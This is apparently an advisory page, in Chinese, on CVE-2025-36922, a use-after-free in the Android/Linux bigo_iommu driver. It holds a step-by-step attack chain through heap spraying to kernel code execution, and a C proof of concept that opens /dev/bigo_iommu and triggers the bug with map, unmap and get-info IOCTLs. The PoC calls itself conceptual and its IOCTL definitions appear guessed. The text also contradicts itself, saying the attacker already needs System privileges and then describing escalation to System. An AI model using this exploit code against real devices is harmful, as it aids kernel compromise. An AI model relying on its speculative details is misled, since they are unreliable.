CVE-2025-36922: Android/Linux内核bigo_iommu驱动Use After Free本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-36922

漏洞类型

Use After Free / 本地权限提升

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Android/Linux内核bigo_iommu驱动

漏洞概述

CVE-2025-36922是存在于Android和Linux内核中bigo_iommu驱动的bigo_map函数的安全漏洞。该漏洞属于Use After Free（释放后重用）类型，攻击者可利用此漏洞在内核级别实现信息泄露，并可能进一步实现本地权限提升。漏洞位于bigo_iommu.c文件的bigo_map函数中，由于内存管理不当，导致已释放的内存被继续访问。此漏洞需要本地访问权限，攻击者需要具备System执行权限，但无需用户交互即可利用。CVSS 3.1评分6.7，属于中等严重程度。该漏洞于2025年12月11日披露，发现者为Google安全团队（[email protected]）。由于该漏洞影响内核级别的内存安全，攻击成功可能导致攻击者获得系统最高权限，访问敏感数据或执行任意代码。

技术细节

该漏洞存在于Linux内核的bigo_iommu驱动模块中，具体位于bigo_iommu.c源文件的bigo_map函数内。漏洞类型为Use After Free（UAF），这是一种经典的内存安全漏洞。在bigo_map函数执行过程中，内存对象被释放后，代码仍尝试访问该内存区域，导致攻击者可以控制已释放的内存内容。由于bigo_iommu驱动在内核空间运行，成功的UAF漏洞利用可以导致本地权限提升，攻击者从普通权限升级到具有System执行权限。攻击者需要本地访问目标系统，并具备较高的初始权限（PR:H）才能利用此漏洞。攻击成功后，攻击者可以读取内核内存中的敏感信息（如密钥、凭证、其他进程的内存数据），并可能进一步实现代码执行。由于该漏洞位于内核IOMMU驱动中，与硬件内存管理相关，因此利用难度相对较高，但一旦成功影响严重。

攻击链分析

STEP 1

步骤1：权限获取

攻击者首先需要获得目标系统的本地访问权限，具备System级别的执行权限。由于该漏洞需要高权限才能利用，攻击者可能已经通过其他方式（如社会工程、另一漏洞等）获得初始 foothold。

STEP 2

步骤2：打开设备节点

攻击者打开bigo_iommu驱动的设备节点（通常为/dev/bigo_iommu），获取与内核驱动的交互接口。这是触发漏洞的必要前提条件。

STEP 3

步骤3：触发内存分配

通过IOCTL命令BIGO_IOMMU_MAP调用bigo_map函数，请求映射一段内存区域。此操作会在内核空间分配内存结构体，但这些结构体会被后续操作释放。

STEP 4

步骤4：触发内存释放

通过IOCTL命令BIGO_IOMMU_UNMAP调用相应的取消映射函数，释放之前分配的内存结构体。此时内部指针仍保留，形成Use After Free条件。

STEP 5

步骤5：触发Use After Free

再次调用驱动函数（如BIGO_IOMMU_GET_INFO），此时驱动代码会访问已被释放但未被清零的内存指针，导致信息泄露或内存破坏。

STEP 6

步骤6：权限提升

如果攻击者能够精心构造释放后内存的内容（如喷射Spray技术），可以覆盖函数指针或关键数据结构，实现内核代码执行，获得系统最高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-36922 PoC - Use After Free in bigo_iommu driver
 * Author: Security Researcher
 * Note: This is a conceptual PoC for demonstration purposes
 * 
 * Prerequisites:
 * - Local access to Android/Linux system
 * - High privileges (System execution level)
 * - Target device with vulnerable bigo_iommu driver
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

/* Define IOCTL commands for bigo_iommu driver */
#define BIGO_IOMMU_MAGIC 0xB9
#define BIGO_IOMMU_MAP _IOW(BIGO_IOMMU_MAGIC, 0x01, struct bigo_iommu_req)
#define BIGO_IOMMU_UNMAP _IOW(BIGO_IOMMU_MAGIC, 0x02, struct bigo_iommu_req)
#define BIGO_IOMMU_GET_INFO _IOW(BIGO_IOMMU_MAGIC, 0x03, struct bigo_iommu_info)

struct bigo_iommu_req {
    unsigned long vaddr;
    unsigned long paddr;
    unsigned long size;
    void *priv_data;
};

struct bigo_iommu_info {
    unsigned int version;
    unsigned int flags;
    unsigned long mapped_size;
};

int trigger_uaf(int fd) {
    struct bigo_iommu_req req;
    struct bigo_iommu_info info;
    int ret;
    
    /* Initialize request structure */
    memset(&req, 0, sizeof(req));
    req.vaddr = 0x100000;
    req.paddr = 0x200000;
    req.size = 0x1000;
    
    /* Step 1: Map memory region - allocates internal structure */
    printf("[*] Step 1: Mapping memory region...\n");
    ret = ioctl(fd, BIGO_IOMMU_MAP, &req);
    if (ret < 0) {
        perror("[-] Map failed");
        return -1;
    }
    printf("[+] Memory mapped successfully\n");
    
    /* Step 2: Unmap the region - frees internal structure but pointer retained */
    printf("[*] Step 2: Unmapping memory region (triggering UAF)...\n");
    ret = ioctl(fd, BIGO_IOMMU_UNMAP, &req);
    if (ret < 0) {
        perror("[-] Unmap failed");
        return -1;
    }
    printf("[+] Memory unmapped - internal structure freed\n");
    
    /* Step 3: Trigger use-after-free by calling get_info 
     * The driver may still reference the freed memory */
    printf("[*] Step 3: Triggering use-after-free condition...\n");
    memset(&info, 0, sizeof(info));
    ret = ioctl(fd, BIGO_IOMMU_GET_INFO, &info);
    if (ret == 0) {
        printf("[+] UAF condition triggered - info leaked: 0x%lx\n", info.mapped_size);
    }
    
    return ret;
}

int main(int argc, char *argv[]) {
    int fd;
    const char *device = "/dev/bigo_iommu";
    
    if (argc > 1) {
        device = argv[1];
    }
    
    printf("[*] CVE-2025-36922 PoC - bigo_iommu UAF\n");
    printf("[*] Target device: %s\n", device);
    
    /* Open the vulnerable device */
    fd = open(device, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        printf("[*] Note: Device may not exist or require root privileges\n");
        return 1;
    }
    
    /* Trigger the UAF vulnerability */
    trigger_uaf(fd);
    
    close(fd);
    return 0;
}

影响范围

Android 12 (所有版本)

Android 12L (所有版本)

Android 13 (所有版本)

Android 14 (所有版本)

Linux内核 5.x (包含bigo_iommu驱动的版本)

Pixel设备 (2025-12-01之前的安全补丁版本)

防御指南

临时缓解措施

由于该漏洞需要本地高权限访问，受影响用户应立即应用设备制造商提供的安全更新。对于无法立即更新的场景，可通过限制物理访问、监控异常的系统调用和内核日志来降低风险。Android用户应确保设备运行最新的安全补丁版本，Pixel设备用户应检查系统更新并安装2025年12月或之后的补丁。企业用户应考虑使用移动设备管理（MDM）解决方案强制执行安全策略。